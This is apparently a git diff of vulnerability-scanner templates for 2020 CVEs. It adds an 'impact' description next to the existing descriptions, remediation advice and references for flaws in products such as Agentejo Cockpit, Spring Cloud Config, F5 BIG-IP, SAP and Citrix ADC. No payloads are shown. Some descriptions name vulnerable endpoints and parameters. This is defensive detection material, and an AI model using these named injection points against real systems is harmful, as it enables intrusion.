b/http/cves/2020/CVE-2020-35846.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php check function. The $eq operator matches documents where the value of a field equals the specified value. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade Agentejo Cockpit to version 0.11.2 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-35847.yaml b/http/cves/2020/CVE-2020-35847.yaml index a39283715a..c166ab3253 100644 --- a/http/cves/2020/CVE-2020-35847.yaml +++ b/http/cves/2020/CVE-2020-35847.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php resetpassword function of the Auth controller. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary NoSQL queries, potentially leading to unauthorized access, data manipulation, or denial of service. remediation: | Upgrade Agentejo Cockpit to version 0.11.2 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-35848.yaml b/http/cves/2020/CVE-2020-35848.yaml index fa769366de..a615429263 100644 --- a/http/cves/2020/CVE-2020-35848.yaml +++ b/http/cves/2020/CVE-2020-35848.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Agentejo Cockpit prior to 0.12.0 is vulnerable to NoSQL Injection via the newpassword method of the Auth controller, which is responsible for displaying the user password reset form. + impact: | + Successful exploitation of this vulnerability could allow an attacker to manipulate database queries, potentially leading to unauthorized access, data leakage, or data corruption. remediation: | Upgrade Agentejo Cockpit to version 0.12.0 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-35951.yaml b/http/cves/2020/CVE-2020-35951.yaml index bfa76ac8f1..0a4eaefa2a 100644 --- a/http/cves/2020/CVE-2020-35951.yaml +++ b/http/cves/2020/CVE-2020-35951.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: critical description: Wordpress Quiz and Survey Master <7.0.1 allows users to delete arbitrary files such as wp-config.php file, which could effectively take a site offline and allow an attacker to reinstall with a WordPress instance under their control. This occurred via qsm_remove_file_fd_question, which allowed unauthenticated deletions (even though it was only intended for a person to delete their own quiz-answer files). + impact: | + This vulnerability can lead to unauthorized deletion of critical files, resulting in data loss or server compromise. remediation: | Upgrade to the latest version of Wordpress Quiz and Survey Master plugin (7.0.1 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-35984.yaml b/http/cves/2020/CVE-2020-35984.yaml index 50a2e77bf2..c0223c03d8 100644 --- a/http/cves/2020/CVE-2020-35984.yaml +++ b/http/cves/2020/CVE-2020-35984.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross site scripting (XSS) vulnerability in the 'Users Alerts' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Title' parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the application. remediation: | Upgrade Rukovoditel to a version higher than 2.7.2 to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-35985.yaml b/http/cves/2020/CVE-2020-35985.yaml index 2ece3d397d..4a5d7b4f0e 100644 --- a/http/cves/2020/CVE-2020-35985.yaml +++ b/http/cves/2020/CVE-2020-35985.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross site scripting (XSS) vulnerability in the 'Global Lists" feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the application. remediation: | Upgrade Rukovoditel to a version higher than 2.7.2 to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-35986.yaml b/http/cves/2020/CVE-2020-35986.yaml index fdb7b46403..d1300ee810 100644 --- a/http/cves/2020/CVE-2020-35986.yaml +++ b/http/cves/2020/CVE-2020-35986.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross site scripting (XSS) vulnerability in the 'Users Access Groups' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the application. remediation: | Upgrade Rukovoditel to a version higher than 2.7.2 to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-35987.yaml b/http/cves/2020/CVE-2020-35987.yaml index 0841c06c90..5cdb027bee 100644 --- a/http/cves/2020/CVE-2020-35987.yaml +++ b/http/cves/2020/CVE-2020-35987.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross site scripting (XSS) vulnerability in the 'Entities List' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to a version higher than 2.7.2 or apply the vendor-provided patch to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-36289.yaml b/http/cves/2020/CVE-2020-36289.yaml index 38f5c0c88c..df87d6235a 100644 --- a/http/cves/2020/CVE-2020-36289.yaml +++ b/http/cves/2020/CVE-2020-36289.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: Jira Server and Data Center is susceptible to information disclosure. An attacker can enumerate users via the QueryComponentRendererValue!Default.jspa endpoint and thus potentially access sensitive information, modify data, and/or execute unauthorized operations, Affected versions are before version 8.5.13, from version 8.6.0 before 8.13.5, and from version 8.14.0 before 8.15.1. + impact: | + An attacker can gain access to sensitive information, potentially leading to further attacks. remediation: | Apply the necessary patches or updates provided by Atlassian to fix the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-36365.yaml b/http/cves/2020/CVE-2020-36365.yaml index 4593a4b02e..ea8e9f21b0 100644 --- a/http/cves/2020/CVE-2020-36365.yaml +++ b/http/cves/2020/CVE-2020-36365.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Smartstore (aka "SmartStoreNET") before 4.1.0 contains an open redirect vulnerability via CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information. remediation: | Upgrade Smartstore to version 4.1.0 or later to fix the open redirect vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-36510.yaml b/http/cves/2020/CVE-2020-36510.yaml index 10d46fdf44..6ec094da05 100644 --- a/http/cves/2020/CVE-2020-36510.yaml +++ b/http/cves/2020/CVE-2020-36510.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress 15Zine before 3.3.0 is vulnerable to reflected cross-site scripting because the theme does not sanitize the cbi parameter before including it in the HTTP response via the cb_s_a AJAX action. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update WordPress 15Zine to version 3.3.0 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-4463.yaml b/http/cves/2020/CVE-2020-4463.yaml index 25d368937e..ccfcafadad 100644 --- a/http/cves/2020/CVE-2020-4463.yaml +++ b/http/cves/2020/CVE-2020-4463.yaml @@ -9,6 +9,8 @@ info: XML external entity injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. + impact: | + The vulnerability can lead to unauthorized access to sensitive information or a denial of service. remediation: | Apply the latest security patches or updates provided by IBM to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-5191.yaml b/http/cves/2020/CVE-2020-5191.yaml index eaa5e1bb08..518e7497e1 100644 --- a/http/cves/2020/CVE-2020-5191.yaml +++ b/http/cves/2020/CVE-2020-5191.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | PHPGurukul Hospital Management System in PHP 4.0 contains multiple cross-site scripting vulnerabilities. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-5192.yaml b/http/cves/2020/CVE-2020-5192.yaml index 3a9961fc2a..f72ebee6d0 100644 --- a/http/cves/2020/CVE-2020-5192.yaml +++ b/http/cves/2020/CVE-2020-5192.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Hospital Management System 4.0 contains multiple SQL injection vulnerabilities because multiple pages and parameters do not validate user input. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in Hospital Management System 4.0. reference: diff --git a/http/cves/2020/CVE-2020-5284.yaml b/http/cves/2020/CVE-2020-5284.yaml index 7fff0718d8..a9a90233e6 100644 --- a/http/cves/2020/CVE-2020-5284.yaml +++ b/http/cves/2020/CVE-2020-5284.yaml @@ -5,6 +5,8 @@ info: author: rootxharsh,iamnoooob,dwisiswant0 severity: medium description: Next.js versions before 9.3.2 are vulnerable to local file inclusion. An attacker can craft special requests to access files in the dist directory (.next). This does not affect files outside of the dist directory (.next). In general, the dist directory only holds build assets unless your application intentionally stores other assets under this directory. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: This issue is fixed in version 9.3.2. reference: - https://github.com/zeit/next.js/releases/tag/v9.3.2 diff --git a/http/cves/2020/CVE-2020-5307.yaml b/http/cves/2020/CVE-2020-5307.yaml index c4b4830121..f6a453a74a 100644 --- a/http/cves/2020/CVE-2020-5307.yaml +++ b/http/cves/2020/CVE-2020-5307.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the PHPGurukul Dairy Farm Shop Management System 1.0. reference: diff --git a/http/cves/2020/CVE-2020-5405.yaml b/http/cves/2020/CVE-2020-5405.yaml index 420a19df8f..f2cc4adeb7 100644 --- a/http/cves/2020/CVE-2020-5405.yaml +++ b/http/cves/2020/CVE-2020-5405.yaml @@ -5,6 +5,8 @@ info: author: harshbothra_ severity: medium description: Spring Cloud Config versions 2.2.x prior to 2.2.2, 2.1.x prior to 2.1.7, and older unsupported versions are vulnerable to local file inclusion because they allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. + impact: | + An attacker can read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation. remediation: | Upgrade to a patched version of Spring Cloud Config or apply the recommended security patches to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-5410.yaml b/http/cves/2020/CVE-2020-5410.yaml index 9862e8a51a..b748e7e075 100644 --- a/http/cves/2020/CVE-2020-5410.yaml +++ b/http/cves/2020/CVE-2020-5410.yaml @@ -5,6 +5,8 @@ info: author: mavericknerd severity: high description: Spring Cloud Config Server versions 2.2.x prior to 2.2.3, versions 2.1.x prior to 2.1.9, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user or attacker can send a request using a specially crafted URL that can lead to a local file inclusion attack. + impact: | + An attacker can exploit this vulnerability to read arbitrary files from the server, potentially leading to unauthorized access or sensitive information disclosure. remediation: | Upgrade to a patched version of Spring Cloud Config Server or apply the recommended security patches. reference: diff --git a/http/cves/2020/CVE-2020-5412.yaml b/http/cves/2020/CVE-2020-5412.yaml index 7197156ee4..a1884ad635 100644 --- a/http/cves/2020/CVE-2020-5412.yaml +++ b/http/cves/2020/CVE-2020-5412.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: medium description: Spring Cloud Netflix 2.2.x prior to 2.2.4, 2.1.x prior to 2.1.6, and older unsupported versions are susceptible to server-side request forgery. Applications can use the Hystrix Dashboard proxy.stream endpoint to make requests to any server reachable by the server hosting the dashboard. An attacker can send a request to other servers and thus potentially access sensitive information, modify data, and/or execute unauthorized operations. + impact: | + The vulnerability can result in unauthorized access to sensitive data or systems, leading to potential data breaches or further exploitation. remediation: | Apply the latest security patches or updates provided by Spring Cloud Netflix to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-5775.yaml b/http/cves/2020/CVE-2020-5775.yaml index bc36a779aa..a0c15232a7 100644 --- a/http/cves/2020/CVE-2020-5775.yaml +++ b/http/cves/2020/CVE-2020-5775.yaml @@ -5,6 +5,8 @@ info: author: alph4byt3 severity: medium description: Canvas version 2020-07-29 is susceptible to blind server-side request forgery. An attacker can cause Canvas to perform HTTP GET requests to arbitrary domains and thus potentially access sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, data leakage, and potential remote code execution. remediation: | Apply the latest security patches provided by Canvas LMS to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-5776.yaml b/http/cves/2020/CVE-2020-5776.yaml index f8d99a687e..e5bc898881 100644 --- a/http/cves/2020/CVE-2020-5776.yaml +++ b/http/cves/2020/CVE-2020-5776.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: high description: MAGMI (Magento Mass Importer) is vulnerable to cross-site request forgery (CSRF) due to a lack of CSRF tokens. Remote code execution (via phpcli command) is also possible in the event that CSRF is leveraged against an existing admin session. + impact: | + Successful exploitation of this vulnerability could allow an attacker to perform unauthorized actions on behalf of the victim user. remediation: | Implement CSRF protection mechanisms such as anti-CSRF tokens and referer validation. reference: diff --git a/http/cves/2020/CVE-2020-5777.yaml b/http/cves/2020/CVE-2020-5777.yaml index 31712c76b1..d032e82937 100644 --- a/http/cves/2020/CVE-2020-5777.yaml +++ b/http/cves/2020/CVE-2020-5777.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Magento Mass Importer (aka MAGMI) versions prior to 0.7.24 are vulnerable to a remote authentication bypass due to allowing default credentials in the event there is a database connection failure. + impact: | + An attacker can bypass authentication and gain unauthorized access to the Magento Mass Importer plugin. remediation: | Upgrade to version 0.7.24 or later to fix the authentication bypass vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-5902.yaml b/http/cves/2020/CVE-2020-5902.yaml index 8a4e4d8ca3..a8591cd6a6 100644 --- a/http/cves/2020/CVE-2020-5902.yaml +++ b/http/cves/2020/CVE-2020-5902.yaml @@ -5,6 +5,8 @@ info: author: madrobot,dwisiswant0,ringo severity: critical description: F5 BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the necessary security patches or upgrade to a non-vulnerable version of F5 BIG-IP TMUI. reference: diff --git a/http/cves/2020/CVE-2020-6171.yaml b/http/cves/2020/CVE-2020-6171.yaml index c6baa16471..a0cd9665f1 100644 --- a/http/cves/2020/CVE-2020-6171.yaml +++ b/http/cves/2020/CVE-2020-6171.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | CLink Office 2.0 is vulnerable to cross-site scripting in the index page of the management console and allows remote attackers to inject arbitrary web script or HTML via the lang parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Apply the latest security patches or updates provided by the vendor to fix this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-6207.yaml b/http/cves/2020/CVE-2020-6207.yaml index 44d50b4222..0996451ce6 100644 --- a/http/cves/2020/CVE-2020-6207.yaml +++ b/http/cves/2020/CVE-2020-6207.yaml @@ -5,6 +5,8 @@ info: author: _generic_human_ severity: critical description: SAP Solution Manager (SolMan) running version 7.2 has a remote command execution vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem). The vulnerability occurs due to missing authentication checks when submitting SOAP requests to the /EemAdminService/EemAdmin page to get information about connected SMDAgents, send HTTP request (SSRF), and execute OS commands on connected SMDAgent. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected system. remediation: | Apply the latest security patches provided by SAP to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-6287.yaml b/http/cves/2020/CVE-2020-6287.yaml index ec79793e3f..0287a222a9 100644 --- a/http/cves/2020/CVE-2020-6287.yaml +++ b/http/cves/2020/CVE-2020-6287.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: SAP NetWeaver AS JAVA (LM Configuration Wizard), versions 7.30, 7.31, 7.40, 7.50, does not perform an authentication check which allows an attacker without prior authentication to execute configuration tasks to perform critical actions against the SAP Java system, including the ability to create an administrative user, and therefore compromising Confidentiality, Integrity and Availability of the system. + impact: | + Successful exploitation of this vulnerability allows an attacker to gain unauthorized administrative access to the SAP system. remediation: | Apply the relevant SAP Security Note or patch provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-6308.yaml b/http/cves/2020/CVE-2020-6308.yaml index 994a9fa875..5be41b2a4f 100644 --- a/http/cves/2020/CVE-2020-6308.yaml +++ b/http/cves/2020/CVE-2020-6308.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | SAP BusinessObjects Business Intelligence Platform (Web Services) 410, 420, and 430 is susceptible to blind server-side request forgery. An attacker can inject arbitrary values as CMS parameters to perform lookups on the internal network, which is otherwise not accessible externally. On successful exploitation, attacker can scan network to determine infrastructure and gather information for further attacks like remote file inclusion, retrieving server files, bypassing firewall, and forcing malicious requests. + impact: | + Successful exploitation of this vulnerability could allow an attacker to send arbitrary requests from the vulnerable server, potentially leading to unauthorized access to internal resources or further attacks. remediation: | Apply the relevant security patches provided by SAP to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-6637.yaml b/http/cves/2020/CVE-2020-6637.yaml index 2cb87321dc..a0fb029ccf 100644 --- a/http/cves/2020/CVE-2020-6637.yaml +++ b/http/cves/2020/CVE-2020-6637.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: OpenSIS Community Edition version 7.3 is vulnerable to SQL injection via the USERNAME parameter of index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: | Apply the latest security patch or upgrade to a patched version of OpenSIS. reference: diff --git a/http/cves/2020/CVE-2020-7107.yaml b/http/cves/2020/CVE-2020-7107.yaml index b8a7c88fb3..d3c2cac46b 100644 --- a/http/cves/2020/CVE-2020-7107.yaml +++ b/http/cves/2020/CVE-2020-7107.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Ultimate FAQ plugin before 1.8.30 is susceptible to cross-site scripting via Display_FAQ to Shortcodes/DisplayFAQs.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions. remediation: Fixed in version 1.8.30. reference: - https://wpscan.com/vulnerability/5e1cefd5-5369-44bd-aef7-2a382c8d8e33 diff --git a/http/cves/2020/CVE-2020-7136.yaml b/http/cves/2020/CVE-2020-7136.yaml index defb7bdfc3..e383a4a3e8 100644 --- a/http/cves/2020/CVE-2020-7136.yaml +++ b/http/cves/2020/CVE-2020-7136.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access. + impact: | + An attacker can gain unauthorized access to the HPE Smart Update Manager, potentially leading to further compromise of the system. remediation: Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP). reference: - https://www.tenable.com/security/research/tra-2020-02 diff --git a/http/cves/2020/CVE-2020-7209.yaml b/http/cves/2020/CVE-2020-7209.yaml index 7c0184145b..5fa9038430 100644 --- a/http/cves/2020/CVE-2020-7209.yaml +++ b/http/cves/2020/CVE-2020-7209.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: LinuxKI v6.0-1 and earlier are vulnerable to remote code execution. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system. remediation: This is resolved in release 6.0-2. reference: - http://packetstormsecurity.com/files/157739/HP-LinuxKI-6.01-Remote-Command-Injection.html diff --git a/http/cves/2020/CVE-2020-7318.yaml b/http/cves/2020/CVE-2020-7318.yaml index bce0682f83..fc5a4b9b69 100644 --- a/http/cves/2020/CVE-2020-7318.yaml +++ b/http/cves/2020/CVE-2020-7318.yaml @@ -10,6 +10,8 @@ info: - https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/ - https://kc.mcafee.com/corporate/index?page=content&id=SB10332 - https://nvd.nist.gov/vuln/detail/CVE-2020-7318 + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking or unauthorized actions. remediation: | Upgrade to McAfee ePolicy Orchestrator version 5.10.9 Update 9 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-7796.yaml b/http/cves/2020/CVE-2020-7796.yaml index 969276a9e4..fca04fdb59 100644 --- a/http/cves/2020/CVE-2020-7796.yaml +++ b/http/cves/2020/CVE-2020-7796.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 is susceptible to server-side request forgery when WebEx zimlet is installed and zimlet JSP is enabled. + impact: | + Successful exploitation of this vulnerability could allow an attacker to send arbitrary requests from the vulnerable server, potentially leading to unauthorized access or data leakage. remediation: | Apply the latest patch or upgrade to Zimbra Collaboration Suite version 8.8.15 Patch 7 or higher to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-7943.yaml b/http/cves/2020/CVE-2020-7943.yaml index f504fdbaaf..1e79c2e632 100644 --- a/http/cves/2020/CVE-2020-7943.yaml +++ b/http/cves/2020/CVE-2020-7943.yaml @@ -5,6 +5,8 @@ info: author: c-sh0 severity: high description: Puppet Server and PuppetDB provide useful performance and debugging information via their metrics API endpoints, which may contain sensitive information when left exposed. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information stored in Puppet Server/PuppetDB. remediation: | Apply the necessary patches or updates provided by Puppet to fix the vulnerability and ensure sensitive information is properly protected. reference: diff --git a/http/cves/2020/CVE-2020-7980.yaml b/http/cves/2020/CVE-2020-7980.yaml index 3d4eae03d0..780bb43480 100644 --- a/http/cves/2020/CVE-2020-7980.yaml +++ b/http/cves/2020/CVE-2020-7980.yaml @@ -5,6 +5,8 @@ info: author: ritikchaddha severity: critical description: 'Intellian Aptus Web 1.24 allows remote attackers to execute arbitrary OS commands via the Q field within JSON data to the cgi-bin/libagent.cgi URI. NOTE: a valid sid cookie for a login to the intellian default account might be needed.' + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system. remediation: | Upgrade to a patched version of Satellian Intellian Aptus Web (version > 1.24). reference: diff --git a/http/cves/2020/CVE-2020-8115.yaml b/http/cves/2020/CVE-2020-8115.yaml index 3749038f95..ea4f8fdbf0 100644 --- a/http/cves/2020/CVE-2020-8115.yaml +++ b/http/cves/2020/CVE-2020-8115.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Revive Adserver 5.0.3 and prior contains a reflected cross-site scripting vulnerability in the publicly accessible afr.php delivery script. In older versions, it is possible to steal the session identifier and gain access to the admin interface. The query string sent to the www/delivery/afr.php script is printed back without proper escaping, allowing an attacker to execute arbitrary JavaScript code on the browser of the victim. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: There are currently no known exploits. As of 3.2.2, the session identifier cannot be accessed as it is stored in an http-only cookie. reference: - https://hackerone.com/reports/775693 diff --git a/http/cves/2020/CVE-2020-8163.yaml b/http/cves/2020/CVE-2020-8163.yaml index 33e6362f3d..aac25ab0e1 100644 --- a/http/cves/2020/CVE-2020-8163.yaml +++ b/http/cves/2020/CVE-2020-8163.yaml @@ -5,6 +5,8 @@ info: author: tim_koopmans severity: high description: Ruby on Rails before version 5.0.1 is susceptible to remote code execution because it passes user parameters as local variables into partials. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution. remediation: | Upgrade Ruby on Rails to version 5.0.1 or above. reference: diff --git a/http/cves/2020/CVE-2020-8191.yaml b/http/cves/2020/CVE-2020-8191.yaml index 796bf3c510..fc52f6097a 100644 --- a/http/cves/2020/CVE-2020-8191.yaml +++ b/http/cves/2020/CVE-2020-8191.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 contain a cross-site scripting vulnerability due to improper input validation. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the necessary security patches or updates provided by Citrix to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-8193.yaml b/http/cves/2020/CVE-2020-8193.yaml index 4ef601175c..b4df22a72f 100644 --- a/http/cves/2020/CVE-2020-8193.yaml +++ b/http/cves/2020/CVE-2020-8193.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 are vulnerable to local file inclusion because they allow unauthenticated access to certain URL endpoints. + impact: | + An attacker can access sensitive information stored on the server, potentially leading to further exploitation or unauthorized access. remediation: | Apply the latest security patches or updates provided by Citrix to fix the local file inclusion vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-8194.yaml b/http/cves/2020/CVE-2020-8194.yaml index 41519acb3f..bb98811603 100644 --- a/http/cves/2020/CVE-2020-8194.yaml +++ b/http/cves/2020/CVE-2020-8194.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: medium description: Citrix ADC and NetScaler Gateway are susceptible to remote code injection. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. Affected versions are before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18. Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allow modification of a file download. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the necessary security patches or updates provided by Citrix to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-8209.yaml b/http/cves/2020/CVE-2020-8209.yaml index 1693837ae1..1d910a5908 100644 --- a/http/cves/2020/CVE-2020-8209.yaml +++ b/http/cves/2020/CVE-2020-8209.yaml @@ -10,6 +10,8 @@ info: - https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/ - https://support.citrix.com/article/CTX277457 - https://nvd.nist.gov/vuln/detail/CVE-2020-8209 + impact: | + An attacker can access sensitive information stored on the server, potentially leading to further compromise or unauthorized access. remediation: | Apply the latest security patches or updates provided by Citrix to fix the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-8497.yaml b/http/cves/2020/CVE-2020-8497.yaml index f3c0072771..ef36db51a9 100644 --- a/http/cves/2020/CVE-2020-8497.yaml +++ b/http/cves/2020/CVE-2020-8497.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: medium description: Artica Pandora FMS through 7.42 is susceptible to arbitrary file read. An attacker can read the chat history, which is in JSON format and contains user names, user IDs, private messages, and timestamps. This can potentially lead to unauthorized data modification and other operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially leading to further compromise of the system. remediation: | Upgrade Artica Pandora FMS to version 7.43 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-8512.yaml b/http/cves/2020/CVE-2020-8512.yaml index 50538af251..62ad9fb302 100644 --- a/http/cves/2020/CVE-2020-8512.yaml +++ b/http/cves/2020/CVE-2020-8512.yaml @@ -5,6 +5,8 @@ info: author: pdteam,dwisiswant0 severity: medium description: IceWarp Webmail Server through 11.4.4.1 contains a cross-site scripting vulnerability in the /webmail/ color parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker 